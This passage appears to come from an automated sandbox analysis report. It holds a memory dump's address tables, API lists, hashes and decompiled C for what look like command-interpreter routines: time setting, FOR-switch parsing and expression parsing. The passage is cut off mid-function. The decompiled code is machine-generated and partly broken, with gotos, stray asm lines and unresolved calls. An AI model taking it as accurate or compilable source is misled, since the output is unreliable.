                                  0x0017b01e
                                  0x0017b01f
                                  0x0017b01f
                                  0x0017b025
                                  0x00000000
                                  0x00000000
                                  0x0017b02a
                                  0x0017b066
                                  0x0017b068
                                  0x0017b068
                                  0x0017b071
                                  0x0017b074
                                  0x0017b077
                                  0x00000000
                                  0x0017b02c
                                  0x0017b02c
                                  0x0017b032
                                  0x0017b036
                                  0x0017b03c
                                  0x0017b040
                                  0x0017b043
                                  0x0017b043
                                  0x0017b04b
                                  0x0017b04f
                                  0x0017b051
                                  0x0017b078
                                  0x0017b078
                                  0x0017b07a
                                  0x0017b07c
                                  0x0017b07c
                                  0x0017b04f
                                  0x0017b088
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0017b088
                                  0x0017b08c
                                  0x0017b08f
                                  0x0017b092
                                  0x0017b098
                                  0x0017b09e
                                  0x0017b0a4
                                  0x0017b0ad
                                  0x00000000
                                  0x0017b0b3
                                  0x0017b0b5
                                  0x0017b0bb
                                  0x0017b0bd
                                  0x0017b0c2
                                  0x0017b0c8
                                  0x0017b0cb
                                  0x0017b0d3
                                  0x0017b0d6
                                  0x0017b0d8
                                  0x0017b0d8
                                  0x0017b0de
                                  0x00000000
                                  0x00000000
                                  0x0017b0e3
                                  0x0017b0fa
                                  0x0017b0fa
                                  0x0017b0e5
                                  0x0017b0e5
                                  0x0017b0e9
                                  0x0017b0ed
                                  0x00000000
                                  0x0017b0ef
                                  0x0017b0ef
                                  0x0017b0f2
                                  0x0017b0f8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0017b0f8
                                  0x0017b0ed
                                  0x0017b103
                                  0x0017b105
                                  0x0017b10b
                                  0x0017b110
                                  0x0017b112
                                  0x0017b112
                                  0x0017b118
                                  0x00000000
                                  0x00000000
                                  0x0017b11d
                                  0x0017b134
                                  0x0017b134
                                  0x0017b136
                                  0x0017b11f
                                  0x0017b11f
                                  0x0017b123
                                  0x0017b127
                                  0x00000000
                                  0x0017b129
                                  0x0017b129
                                  0x0017b12c
                                  0x0017b132
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0017b132
                                  0x0017b127
                                  0x0017b141
                                  0x0017b143
                                  0x0017b149
                                  0x0017b14c
                                  0x0017b14c
                                  0x0017b14f
                                  0x0017b152
                                  0x0017b157
                                  0x0017b15f
                                  0x0017b163
                                  0x0017b16f
                                  0x0017b175
                                  0x0017b183
                                  0x0017b188
                                  0x0017b18e
                                  0x0017b193
                                  0x0017b29a
                                  0x0017b199
                                  0x0017b19f
                                  0x0017b1a2
                                  0x0017b1a8
                                  0x0017b1ae
                                  0x0017b1b0
                                  0x0017b1b2
                                  0x0017b1c2
                                  0x0017b1c4
                                  0x0017b1c4
                                  0x0017b1c8
                                  0x0017b1cb
                                  0x0017b1ce
                                  0x0017b1d0
                                  0x0017b1d5
                                  0x0017b1d8
                                  0x0017b1de
                                  0x0017b1de
                                  0x0017b1e4
                                  0x0017b1e4
                                  0x0017b1f0
                                  0x0017b1f5
                                  0x0017b1f9
                                  0x0017b1fa
                                  0x0017b1fd
                                  0x0017b1fd
                                  0x0017b200
                                  0x0017b20a
                                  0x0017b218
                                  0x0017b220
                                  0x0017b22b
                                  0x0017b230
                                  0x0017b233
                                  0x0017b236
                                  0x0017b23a
                                  0x0017b23e
                                  0x0017b23f
                                  0x0017b242
                                  0x0017b253
                                  0x0017b253
                                  0x0017b258
                                  0x0017b25e
                                  0x0017b261
                                  0x0017b261
                                  0x0017b188
                                  0x00000000
                                  0x0017b143
                                  0x0017b13a
                                  0x0017b13c
                                  0x0017b13f
                                  0x00000000
                                  0x0017b13f
                                  0x00000000
                                  0x0017b105
                                  0x0017b0fe
                                  0x0017b100
                                  0x00000000
                                  0x0017b264
                                  0x0017b264
                                  0x0017b265
                                  0x0017b268
                                  0x0017b0c8
                                  0x0017b277
                                  0x0017b27f
                                  0x0017b286
                                  0x0017b28b
                                  0x0017b290
                                  0x0017b290
                                  0x0017b0ad
                                  0x0017afef
                                  0x0017afd1
                                  0x0017b2bc

                                  APIs
                                    • Part of subcall function 0017B4DD: free.MSVCRT(?,0000000A,00000000,?,001735C4), ref: 0017B4FB
                                    • Part of subcall function 0017B4DD: free.MSVCRT(?,0000000A,00000000,?,001735C4), ref: 0017B508
                                    • Part of subcall function 001600B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000), ref: 001600C1
                                    • Part of subcall function 001600B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0015DF68,00000001,?,00000000,00163458,-00000105,0017BDD8,00000240,00164B82,00000000,00000000,0016AE6E,00000000,?), ref: 001600C8
                                  • longjmp.MSVCRT(0018B8B8,00000001,00000000,?,00000000), ref: 0017AF84
                                  • qsort.MSVCRT ref: 0017B007
                                  • wcschr.MSVCRT ref: 0017B05C
                                  • calloc.MSVCRT ref: 0017B09E
                                  • calloc.MSVCRT ref: 0017B16F
                                  • wcschr.MSVCRT ref: 0017B1B8
                                  • memcpy.MSVCRT ref: 0017B20A
                                  • memcpy.MSVCRT ref: 0017B22B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                  • String ID: &()[]{}^=;!%'+,`~
                                  • API String ID: 975110957-381716982
                                  • Opcode ID: 2bfae50a65e47204320bd017bd2c0c8e1c2f8cffe208d608b90c3974f9e8b34f
                                  • Instruction ID: 99234acf0be2deef30c5becea7bc42fa155940e62c67182471ed940b3fc66249
                                  • Opcode Fuzzy Hash: 2bfae50a65e47204320bd017bd2c0c8e1c2f8cffe208d608b90c3974f9e8b34f
                                  • Instruction Fuzzy Hash: 05C1C172A08214DBDB249F68DC817AEBBB1FF59710F15806EE848EB342EB309D45CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00173CC7, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 45%
                                  			E00173CC7(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v34;
				short _v36;
				char _v40;
				char _v72;
				char _v604;
				struct _SYSTEMTIME _v620;
				signed int _v624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t48;
				signed int _t50;
				short* _t55;
				void* _t61;
				intOrPtr _t67;
				signed int* _t78;
				signed int _t87;
				intOrPtr* _t88;
				short* _t96;
				signed int _t101;
				intOrPtr* _t103;
				void* _t108;
				void* _t110;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int* _t120;
				short* _t122;
				signed int _t123;
				signed int _t124;
				signed int _t127;
				void* _t128;
				void* _t129;

				_t38 =  *0x17d0b4; // 0x3dd0c51d
				_v8 = _t38 ^ _t127;
				_t124 = __edx;
				_t88 = __ecx;
				if(__edx != 0) {
					_t91 =  &_v34;
					_v40 = 0x2e003a;
					_v36 =  *0x17f81c;
					E00161040( &_v34, 0xd, 0x17f7fc);
					goto L10;
				} else {
					_t122 = __edx + 0x10;
					_t120 =  &_v40;
					_t110 = L"/-." - _t120;
					while(_t122 + 0x7fffffee != 0) {
						_t87 =  *(_t110 + _t120) & 0x0000ffff;
						if(_t87 == 0) {
							break;
						}
						 *_t120 = _t87;
						_t120 =  &(_t120[0]);
						_t122 = _t122 - 1;
						if(_t122 != 0) {
							continue;
						}
						L7:
						_t120 = _t120 - 2;
						L8:
						_t91 =  &_v40;
						 *_t120 = 0;
						E001618C0( &_v40, 0x10, 0x17f80c);
						L10:
						while(1) {
							L10:
							if(_t88 == 0 ||  *_t88 == 0) {
								_t42 =  *0x17d540; // 0x0
								_t43 = _t42;
								if(_t43 == 0) {
									_t44 = 0x2342;
								} else {
									if(_t43 == 2) {
										_t44 = 0x4000271d;
									} else {
										_t44 = 0x4000271e;
									}
								}
								if(_t124 != 0) {
									_push(0);
									_push(0x2343);
									E0015C108(_t91);
									_t129 = _t128 + 8;
								} else {
									E0015C108(_t91, _t44, 1, 0x17f80c);
									_t129 = _t128 + 0xc;
								}
								__imp___get_osfhandle( &_v624);
								_t128 = _t129 + 4;
								_t113 =  &_v604;
								if(E00173B11( &_v624,  &_v604, 0, 0x104) == 0) {
									goto L58;
								} else {
									_t50 = _v624;
									if(_t50 == 0) {
										goto L58;
									}
									 *((short*)(_t127 + _t50 * 2 - 0x258)) = 0;
									_t96 =  &_v604;
									_t51 = _v604;
									if(_t51 == 0) {
										L33:
										if(E00160178(_t51) == 0) {
											_push( &_v604);
											E001625D9(L"%s\r\n");
											_t128 = _t128 + 8;
										}
										goto L35;
									}
									_t119 = _t51 & 0x0000ffff;
									while(_t119 != 0xa && _t119 != 0xd) {
										_t51 =  *(_t96 + 2) & 0x0000ffff;
										_t96 = _t96 + 2;
										_t119 = _t51;
										if(_t51 != 0) {
											continue;
										}
										goto L33;
									}
									_t51 = 0;
									 *_t96 = 0;
									goto L33;
								}
							} else {
								_t103 = _t88;
								_t11 = _t103 + 2; // 0x2
								_t113 = _t11;
								do {
									_t67 =  *_t103;
									_t103 = _t103 + 2;
								} while (_t67 != 0);
								_t105 = _t103 - _t113 >> 1;
								if(_t103 - _t113 >> 1 >= 0x104) {
									_push(0);
									asm("sbb esi, esi");
									_push(_t124);
									E0015C108(_t105);
									L57:
									L58:
									_t48 = 1;
									L59:
									return E00166FD0(_t48, _t88, _v8 ^ _t127, _t113, _t122, _t124);
								}
								E00161040( &_v604, 0x105, _t88);
								L35:
								E00161040( &_v72, 0x10,  &_v40);
								_t115 = 0x10;
								_t55 =  &_v72;
								while( *_t55 != 0) {
									_t55 = _t55 + 2;
									_t115 = _t115 - 1;
									if(_t115 != 0) {
										continue;
									}
									break;
								}
								asm("sbb ecx, ecx");
								_t101 =  ~_t115 & 0x00000010 - _t115;
								if(_t115 == 0) {
									L48:
									_t113 =  &_v72;
									_t122 = E0015EA40( &_v604,  &_v72, 2);
									if( *_t122 == 0) {
										L61:
										_t48 = 0;
										goto L59;
									}
									GetLocalTime( &_v620);
									_t113 = _t122;
									_t91 =  &_v620;
									_push( &_v40);
									if(_t124 != 0) {
										_t61 = E00174159( &_v620, _t113);
									} else {
										_t61 = E00173FD4( &_v620, _t113);
									}
									if(_t61 == 0) {
										L55:
										_push(0);
										asm("sbb eax, eax");
										_push(( ~_t124 & 0x00000003) + 0x232f);
										E0015C108(_t91);
										_t128 = _t128 + 8;
										_t88 = 0;
										continue;
									} else {
										SetLocalTime( &_v620);
										if(SetLocalTime( &_v620) != 0) {
											goto L61;
										}
										if(GetLastError() == 0x522) {
											_push(0);
											_push(GetLastError());
											E0015C5A2(_t91);
											goto L57;
										}
										goto L55;
									}
								}
								_t78 =  &_v72 + _t101 * 2;
								_t118 = 0x10 - _t101;
								if(0x10 == 0) {
									L46:
									_t78 = _t78 - 2;
									L47:
									 *_t78 = 0;
									goto L48;
								}
								_t108 = 0x7ffffffe;
								_t88 = ";" - _t78;
								while(_t108 != 0) {
									_t123 =  *(_t88 + _t78) & 0x0000ffff;
									if(_t123 == 0) {
										break;
									}
									 *_t78 = _t123;
									_t108 = _t108 - 1;
									_t78 =  &(_t78[0]);
									_t118 = _t118 - 1;
									if(_t118 != 0) {
										continue;
									}
									goto L46;
								}
								if(_t118 != 0) {
									goto L47;
								}
								goto L46;
							}
						}
					}
					if(_t122 != 0) {
						goto L8;
					}
					goto L7;
				}
			}









































                                  0x00173cd2
                                  0x00173cd9
                                  0x00173cde
                                  0x00173ce0
                                  0x00173ce5
                                  0x00173d3b
                                  0x00173d48
                                  0x00173d4f
                                  0x00173d53
                                  0x00000000
                                  0x00173ce7
                                  0x00173ce7
                                  0x00173cef
                                  0x00173cf4
                                  0x00173cf7
                                  0x00173d01
                                  0x00173d08
                                  0x00000000
                                  0x00000000
                                  0x00173d0a
                                  0x00173d0d
                                  0x00173d10
                                  0x00173d13
                                  0x00000000
                                  0x00000000
                                  0x00173d1b
                                  0x00173d1b
                                  0x00173d1e
                                  0x00173d20
                                  0x00173d23
                                  0x00173d2e
                                  0x00000000
                                  0x00173d58
                                  0x00173d58
                                  0x00173d5a
                                  0x00173d98
                                  0x00173d9d
                                  0x00173da0
                                  0x00173db5
                                  0x00173da2
                                  0x00173da5
                                  0x00173dae
                                  0x00173da7
                                  0x00173da7
                                  0x00173da7
                                  0x00173da5
                                  0x00173dbc
                                  0x00173dd0
                                  0x00173dd2
                                  0x00173dd7
                                  0x00173ddc
                                  0x00173dbe
                                  0x00173dc6
                                  0x00173dcb
                                  0x00173dcb
                                  0x00173ded
                                  0x00173df3
                                  0x00173df6
                                  0x00173e05
                                  0x00000000
                                  0x00173e0b
                                  0x00173e0b
                                  0x00173e13
                                  0x00000000
                                  0x00000000
                                  0x00173e1b
                                  0x00173e23
                                  0x00173e29
                                  0x00173e33
                                  0x00173e59
                                  0x00173e62
                                  0x00173e6a
                                  0x00173e70
                                  0x00173e75
                                  0x00173e75
                                  0x00000000
                                  0x00173e62
                                  0x00173e35
                                  0x00173e38
                                  0x00173e44
                                  0x00173e48
                                  0x00173e4b
                                  0x00173e50
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00173e52
                                  0x00173e54
                                  0x00173e56
                                  0x00000000
                                  0x00173e56
                                  0x00173d62
                                  0x00173d62
                                  0x00173d64
                                  0x00173d64
                                  0x00173d67
                                  0x00173d67
                                  0x00173d6a
                                  0x00173d6d
                                  0x00173d74
                                  0x00173d7c
                                  0x00173f94
                                  0x00173f96
                                  0x00173fa1
                                  0x00173fa2
                                  0x00173fa7
                                  0x00173faa
                                  0x00173faa
                                  0x00173faf
                                  0x00173fbf
                                  0x00173fbf
                                  0x00173d8e
                                  0x00173e78
                                  0x00173e84
                                  0x00173e89
                                  0x00173e8e
                                  0x00173e97
                                  0x00173e9d
                                  0x00173ea0
                                  0x00173ea3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00173ea3
                                  0x00173eb0
                                  0x00173eb2
                                  0x00173eb6
                                  0x00173efe
                                  0x00173f00
                                  0x00173f0e
                                  0x00173f14
                                  0x00173fd0
                                  0x00173fd0
                                  0x00000000
                                  0x00173fd0
                                  0x00173f21
                                  0x00173f2a
                                  0x00173f2c
                                  0x00173f32
                                  0x00173f35
                                  0x00173f3e
                                  0x00173f37
                                  0x00173f37
                                  0x00173f37
                                  0x00173f45
                                  0x00173f72
                                  0x00173f76
                                  0x00173f78
                                  0x00173f82
                                  0x00173f83
                                  0x00173f88
                                  0x00173f8b
                                  0x00000000
                                  0x00173f47
                                  0x00173f4e
                                  0x00173f63
                                  0x00000000
                                  0x00000000
                                  0x00173f70
                                  0x00173fc0
                                  0x00173fc8
                                  0x00173fc9
                                  0x00000000
                                  0x00173fc9
                                  0x00000000
                                  0x00173f70
                                  0x00173f45
                                  0x00173ec0
                                  0x00173ec3
                                  0x00173ec5
                                  0x00173ef6
                                  0x00173ef6
                                  0x00173ef9
                                  0x00173efb
                                  0x00000000
                                  0x00173efb
                                  0x00173ecc
                                  0x00173ed1
                                  0x00173ed7
                                  0x00173edb
                                  0x00173ee2
                                  0x00000000
                                  0x00000000
                                  0x00173ee4
                                  0x00173ee7
                                  0x00173ee8
                                  0x00173eeb
                                  0x00173eee
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00173ef0
                                  0x00173ef4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00173ef4
                                  0x00173d5a
                                  0x00173d58
                                  0x00173d19
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00173d19

                                  APIs
                                  • _get_osfhandle.MSVCRT ref: 00173DED
                                  • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 00173F21
                                  • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 00173F4E
                                  • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 00173F5B
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 00173F65
                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 00173FC2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: LocalTime$ErrorLast$_get_osfhandle
                                  • String ID: %s$/-.$:
                                  • API String ID: 1033501010-879152773
                                  • Opcode ID: 08dc89acc202dee0753ea53331a85e71710b8c5b9e73ed9a4fe4cfad061f2978
                                  • Instruction ID: feb9bbacdc1644116c09b02a998c62d3ce14cb2b95631b4e37f08f271a026d00
                                  • Opcode Fuzzy Hash: 08dc89acc202dee0753ea53331a85e71710b8c5b9e73ed9a4fe4cfad061f2978
                                  • Instruction Fuzzy Hash: 48815731A0021687DF249BA8CC4ABFA3375EF54300F548169E82AEB194EF719F89D751
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00159A26, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E00159A26(void* __eax) {
				void* __edi;
				intOrPtr _t31;
				signed short _t32;
				intOrPtr _t36;
				intOrPtr _t44;
				int _t47;
				intOrPtr _t52;
				void* _t60;
				void* _t70;
				void* _t79;
				void* _t80;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				void* _t91;
				void* _t94;
				signed int _t96;
				intOrPtr* _t101;

				_t96 = 0;
				__imp___wcsicmp(L"FOR/?", 0x18faa0);
				_t102 = __eax;
				if(__eax == 0) {
					 *0x18faa6 = 0;
					_t96 = 1;
				}
				_t63 = 0x2b;
				 *0x18fa8c = 0x1e;
				_t101 = E0015E9A0(_t63, _t102);
				_t31 = 0x2f;
				if(_t96 != 0) {
					 *0x18faa0 = _t31;
					_t32 = 0x3f;
					 *0x18faa2 = _t32;
					 *0x18faa4 = 0;
				} else {
					_t63 = 0;
					E0015F030(0);
				}
				_t88 = 0x2b;
				if(E0015DCE1(_t60, _t88, _t96) != 0) {
					 *(_t101 + 0x38) =  *(_t101 + 0x38) & 0x00000000;
					 *_t101 = 0x3c;
					goto L18;
				} else {
					 *(_t101 + 0x48) =  *(_t101 + 0x48) & 0x00000000;
					_t36 = 0x25;
					if( *0x193cc9 == 0) {
						L13:
						if( *0x18faa0 != _t36) {
							L45:
							E001782EB(_t63);
							L17:
							_push(0x18faa0);
							_push( *(_t101 + 0x38));
							_t89 = 0x1e;
							E00159C73( *(_t101 + 0x38), _t89);
							E00159C4D(L"IN");
							_push(0x18faa0);
							_push( *(_t101 + 0x38));
							_t90 = 0x1e;
							E00159C73( *(_t101 + 0x38), _t90);
							 *((intOrPtr*)(_t101 + 0x3c)) = E00159936(_t60);
							E00159C4D(L"DO");
							_push(0x18faa0);
							_t91 = 8;
							E00161040( *(_t101 + 0x38) + 0x2c, _t91);
							_t70 = 0x2b;
							_t44 = E0015DC74(_t60, _t70);
							 *((intOrPtr*)(_t101 + 0x40)) = _t44;
							if(_t44 == 0) {
								E001782EB(_t70);
							}
							L18:
							return _t101;
						}
						_t47 = iswspace( *0x18faa2 & 0x0000ffff);
						_pop(_t63);
						if(_t47 != 0) {
							goto L45;
						}
						_t63 = L"=,;";
						 *(_t101 + 0x44) =  *0x18faa2 & 0x0000ffff;
						if(E0015D7D4(L"=,;",  *0x18faa2 & 0x0000ffff) != 0 ||  *0x18fa8c != 3) {
							goto L45;
						} else {
							goto L17;
						}
					} else {
						while(1) {
							__imp___wcsicmp(L"/L", 0x18faa0);
							if(_t36 == 0) {
								goto L30;
							}
							L7:
							__imp___wcsicmp(L"/D", 0x18faa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000002;
								L25:
								_t36 = E0015F030(0);
								while(1) {
									__imp___wcsicmp(L"/L", 0x18faa0);
									if(_t36 == 0) {
										goto L30;
									}
									goto L7;
								}
								goto L30;
							}
							__imp___wcsicmp(L"/F", 0x18faa0);
							if(_t36 == 0) {
								 *(_t101 + 0x48) =  *(_t101 + 0x48) | 0x00000008;
								E0015F030(0);
								_t36 =  *0x18faa0;
								_t79 = 0x25;
								__eflags = _t36 - _t79;
								if(_t36 == _t79) {
									continue;
								}
								_t80 = 0x2f;
								__eflags = _t36 - _t80;
								if(_t36 == _t80) {
									continue;
								}
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E001782EB(_t80);
								}
								_t63 = 6 +  *0x18fa8c * 2;
								_t52 = E001600B0(_t63);
								__eflags = _t52;
								if(_t52 == 0) {
									L41:
									E00179287(_t63);
									__imp__longjmp(0x18b8b8, 1);
									L42:
									__eflags = _t63 - 6;
									if(_t63 != 6) {
										__eflags = _t63 - 4;
										if(_t63 != 4) {
											E001782EB(_t63);
										}
									}
									L12:
									_t36 = 0x25;
									goto L13;
								} else {
									_t94 =  *0x18fa8c + 3;
									L24:
									 *((intOrPtr*)(_t101 + 0x4c)) = _t52;
									E00161040(_t52, _t94, 0x18faa0);
									goto L25;
								}
							}
							__imp___wcsicmp(L"/R", 0x18faa0);
							_t63 =  *(_t101 + 0x48);
							if(_t36 == 0) {
								 *(_t101 + 0x48) = _t63 | 0x00000004;
								E0015F030(0);
								__eflags =  *((intOrPtr*)(_t101 + 0x4c));
								if( *((intOrPtr*)(_t101 + 0x4c)) != 0) {
									E001782EB(0);
								}
								_t36 =  *0x18faa0;
								_t86 = 0x25;
								__eflags = _t36 - _t86;
								if(_t36 == _t86) {
									continue;
								} else {
									_t87 = 0x2f;
									__eflags = _t36 - _t87;
									if(_t36 == _t87) {
										continue;
									}
									_t63 = 2 +  *0x18fa8c * 2;
									_t52 = E001600B0(_t63);
									__eflags = _t52;
									if(_t52 == 0) {
										goto L41;
									}
									_t94 =  *0x18fa8c + 1;
									goto L24;
								}
							}
							if(_t63 == 0 || _t63 == 8) {
								goto L12;
							} else {
								__eflags = _t63 - 2;
								if(_t63 == 2) {
									goto L12;
								}
								__eflags = _t63 - 1;
								if(_t63 == 1) {
									goto L12;
								}
								goto L42;
							}
							L30:
							 *(_t101 + 0x48) =  *(_t101 + 0x48) | 1;
							goto L25;
						}
					}
				}
			}























                                  0x00159a34
                                  0x00159a36
                                  0x00159a3e
                                  0x00159a40
                                  0x00171097
                                  0x0017109d
                                  0x0017109d
                                  0x00159a48
                                  0x00159a49
                                  0x00159a58
                                  0x00159a5c
                                  0x00159a5f
                                  0x001710a3
                                  0x001710ab
                                  0x001710ac
                                  0x001710b4
                                  0x00159a65
                                  0x00159a65
                                  0x00159a67
                                  0x00159a67
                                  0x00159a6e
                                  0x00159a76
                                  0x001710bf
                                  0x001710c3
                                  0x00000000
                                  0x00159a7c
                                  0x00159a7c
                                  0x00159a89
                                  0x00159a8a
                                  0x00159b0a
                                  0x00159b11
                                  0x00171154
                                  0x00171154
                                  0x00159b57
                                  0x00159b5f
                                  0x00159b60
                                  0x00159b63
                                  0x00159b64
                                  0x00159b6e
                                  0x00159b76
                                  0x00159b77
                                  0x00159b7a
                                  0x00159b7b
                                  0x00159b8a
                                  0x00159b8d
                                  0x00159b95
                                  0x00159b9b
                                  0x00159b9c
                                  0x00159ba3
                                  0x00159ba4
                                  0x00159ba9
                                  0x00159bae
                                  0x0017115e
                                  0x0017115e
                                  0x00159bb5
                                  0x00159bb8
                                  0x00159bb8
                                  0x00159b1f
                                  0x00159b25
                                  0x00159b28
                                  0x00000000
                                  0x00000000
                                  0x00159b35
                                  0x00159b3a
                                  0x00159b44
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00159a8c
                                  0x00159a8f
                                  0x00159a99
                                  0x00159aa3
                                  0x00000000
                                  0x00000000
                                  0x00159aa9
                                  0x00159ab3
                                  0x00159abd
                                  0x00159c3b
                                  0x00159c19
                                  0x00159c1b
                                  0x00159a8f
                                  0x00159a99
                                  0x00159aa3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00159aa3
                                  0x00000000
                                  0x00159a8f
                                  0x00159acd
                                  0x00159ad7
                                  0x00159bb9
                                  0x00159bbf
                                  0x00159bc4
                                  0x00159bcc
                                  0x00159bcd
                                  0x00159bd0
                                  0x00000000
                                  0x00000000
                                  0x00159bd8
                                  0x00159bd9
                                  0x00159bdc
                                  0x00000000
                                  0x00000000
                                  0x00159be2
                                  0x00159be6
                                  0x00159c46
                                  0x00159c46
                                  0x00159bed
                                  0x00159bf4
                                  0x00159bf9
                                  0x00159bfb
                                  0x00171127
                                  0x00171127
                                  0x00171132
                                  0x00171138
                                  0x00171138
                                  0x0017113b
                                  0x00171141
                                  0x00171144
                                  0x0017114a
                                  0x0017114a
                                  0x00171144
                                  0x00159b07
                                  0x00159b09
                                  0x00000000
                                  0x00159c01
                                  0x00159c07
                                  0x00159c0a
                                  0x00159c11
                                  0x00159c14
                                  0x00000000
                                  0x00159c14
                                  0x00159bfb
                                  0x00159ae7
                                  0x00159aef
                                  0x00159af4
                                  0x001710d1
                                  0x001710d6
                                  0x001710db
                                  0x001710df
                                  0x001710e1
                                  0x001710e1
                                  0x001710e6
                                  0x001710ee
                                  0x001710ef
                                  0x001710f2
                                  0x00000000
                                  0x001710f8
                                  0x001710fa
                                  0x001710fb
                                  0x001710fe
                                  0x00000000
                                  0x00000000
                                  0x00171109
                                  0x00171110
                                  0x00171115
                                  0x00171117
                                  0x00000000
                                  0x00000000
                                  0x0017111f
                                  0x00000000
                                  0x0017111f
                                  0x001710f2
                                  0x00159afc
                                  0x00000000
                                  0x00159c25
                                  0x00159c25
                                  0x00159c28
                                  0x00000000
                                  0x00000000
                                  0x00159c2e
                                  0x00159c30
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00159c36
                                  0x00159c41
                                  0x00159c41
                                  0x00000000
                                  0x00159c41
                                  0x00159a8f
                                  0x00159a8a

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.500638252.0000000000150000.00000040.00000001.sdmp, Offset: 00150000, based on PE: true
                                  • Associated: 0000000E.00000002.500763101.0000000000199000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000E.00000002.500779380.000000000019D000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID: _wcsicmp$iswspace
                                  • String ID: =,;$FOR/?
                                  • API String ID: 759518647-2121398454
                                  • Opcode ID: 26651e2d2042f0419344e0dd00cccc36baf5990a65b6f557d205f8e40e498c09
                                  • Instruction ID: ce83655dbfd86d75cf4a1239471bdcf1d7574d0c1c4e6985bbc50255ff8df675
                                  • Opcode Fuzzy Hash: 26651e2d2042f0419344e0dd00cccc36baf5990a65b6f557d205f8e40e498c09
                                  • Instruction Fuzzy Hash: C061EB31200741DAEB3C6735AC4AB7722A1EB94722F14442EF9178F9D1EF71998EC716
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 001564DC, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E001564DC(void* __eflags, intOrPtr _a4, wchar_t* _a8, long _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v28;
				signed short* _t39;
				short* _t45;
				int _t50;
				wchar_t* _t54;
				long _t55;
				long _t62;
				signed int _t71;

				E00159794( &_a8);
				_t39 = _a8;
				_t62 =  *_t39 & 0x0000ffff;
				if(_t62 == 0) {
					L22:
					_a16 = 0x400023cd;
					L9:
					L10:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					return _a4;
				}
				if(_t62 == 0x28) {
					_a8 =  &(_t39[1]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E00156355();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						L21:
						goto L10;
					}
					E00159794( &_a8);
					_t45 = _a8;
					__eflags =  *_t45 - 0x29;
					if( *_t45 != 0x29) {
						_a16 = 0x400023cc;
					} else {
						_a8 = _t45 + 2;
					}
					goto L9;
				}
				if(wcschr(L"+-~!", _t62) != 0) {
					_a8 =  &(_a8[0]);
					_push( &_v28);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E001564DC(__eflags);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					__eflags = _a16;
					if(_a16 != 0) {
						goto L21;
					}
					E00154409( &_a8, _t62, _a12);
					goto L9;
				}
				_t50 = iswdigit(_t62);
				if(_t50 == 0) {
					__eflags = E00156785( &_a8,  &_v12, __eflags,  &_v8);
					if(__eflags == 0) {
						goto L22;
					} else {
						_a12 = E001560DE(_v8, __eflags);
						goto L9;
					}
				}
				__imp___errno();
				 *_t50 = 0;
				_t54 = _a8;
				if( *_t54 == 0x30) {
					_t71 = _t54[0] & 0x0000ffff;
					__eflags = _t71 - 0x78;
					if(_t71 == 0x78) {
						L24:
						_t55 = wcstoul(_t54,  &_a8, 0);
						L6:
